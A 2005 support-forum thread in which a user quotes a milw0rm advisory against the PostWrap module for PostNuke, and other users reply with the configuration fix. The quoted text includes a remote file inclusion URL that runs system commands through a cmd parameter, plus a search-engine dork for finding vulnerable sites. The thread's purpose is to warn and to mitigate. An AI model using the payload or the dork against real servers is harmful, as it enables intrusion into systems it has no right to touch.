Support Spidean
Do you like our FREE downloads? How about the FREE support for the FREE downloads? Please help us out and donate any amount! It's fast and easy through PayPal.

Spidean Forums

Board Index > Support > Somebody's posted a Hack !!


 < Last Thread   Next Thread >New Topic  Post Reply
Author: Subject: Somebody's posted a Hack !!
DR4296
Newbie





Posts: 1
Registered: 2/26/2005
Status: Offline

   posted on 2/26/2005 at 11:14 AM
Greetings All !

Newbie here! Just installed PostNuke yesterday and Autotheme today.

Didn't realize at first that PostWrap came from this particular website, so I did a Google search for "+postnuke +PostWrap".

The very FIRST item that Google lists is some sort of hacker's post on how to hack into your server (I think) by feeding PostWrap a particular string of data!

Link is:

http://www.milw0rm.com/id.php?id=800

Actual text says:

".,-*'^'~*-,._.,-*'^'~*-,._.,-*'^'~*-,._.,-*'^'~*-,._.,-*'^'~*-,._.,-*'^'~* -,._."
".,-*-,._ -.,-*-,."
".,-*-,._ ALBANIA SECURITY CLAN -.,-*-,."
".,-*-,._ -.,-*-,."
".,-*-,._ ...::www.albanianhaxorz.org::... -.,-*-,."
".,-*-,.- -.,-*-,."
".,-*-,.- PROUD TO BE ALBANIAN -.,-*-,."
".,-*-,._ -.,-*-,."
".,-*-,._ Copyright (c) 2005 ASC irc.gigachat.net #ASC -.,-*-,."
".,-*-,._ -.,-*-,."
".,-*-,._.,-*-,._.,-*-,._.,-*-,._.,-*-,._.,-*-,._.,-*-,._.,-*-,._.,-*-,.-., -*-,."


/index.php?module=PostWrap&page=http://localhost/asc?&cmd=uname%20- a;w;id;pwd

on google */index.php?module=PostWrap&page= ext:php have fun



".,-*'^'~*-,._.,-*'^'~*-,._.,-*'^'~*-,._.,-*'^'~*-,._.,-*'^'~*-,._.,-*'^'~* -,._."
".,-*-,._ -.,-*-,."
".,-*-,._ ALBANIA SECURITY CLAN -.,-*-,."
".,-*-,._ -.,-*-,."
".,-*-,._ ...::www.albanianhaxorz.org::... -.,-*-,."
".,-*-,.- -.,-*-,."
".,-*-,.- PROUD TO BE ALBANIAN -.,-*-,."
".,-*-,._ -.,-*-,."
".,-*-,._ Copyright (c) 2005 ASC irc.gigachat.net #ASC -.,-*-,."
".,-*-,._ -.,-*-,."
".,-*-,._.,-*-,._.,-*-,._.,-*-,._.,-*-,._.,-*-,._.,-*-,._.,-*-,._.,-*-,.-., -*-,."
# milw0rm.com [2005-02-08]


Wondered if anybody had spotted that since the date on that is only a few weeks old ?

Just thought I'd try to notify the author via this post.


Thanks!

-= Dave =-


 
Reply With Quote
burke
Newbie




Posts: 1
Registered: 8/7/2004
Status: Offline

   posted on 3/10/2005 at 11:01 AM
Easy to block:
Under General configuration:
set: Compare URLs against URL Security? to YES

I'm actually surprised this got listed as an advisory. It's almost like posting an advisory that a Windows server has Telnet open -- so configure the system not to run it! Same thing here - tell Postwrap to only allow URLs in your URL Security list.

[Edited on 10/3/2005 by burke]

 

____________________
Burke - MCP+I, MCSE, MCSD, CNE, CCA, CCNA
http://www.pctechsupplier.com
http://www.dimensionquest.com
http://www.dimensionquest.net
 
Reply With Quote
Shawn
Administrator




Posts: 4575
Registered: 10/7/2002
Status: Online

   posted on 3/12/2005 at 01:21 PM
This security setting is on by default. You must specifically turn it off for this nebulos exploit to work.

Also, I have yet to see any working hack. What can be done?

-Shawn
 
Reply With Quote
New Topic    Post Reply


Main Menu

Get AutoTheme

Featured Item

Poll

How do you like the new look?

[ Results | Polls ]

Votes: 103
Comments: 0
Powered by the AutoTheme HTML Theme System
Page created in 0.117842 Seconds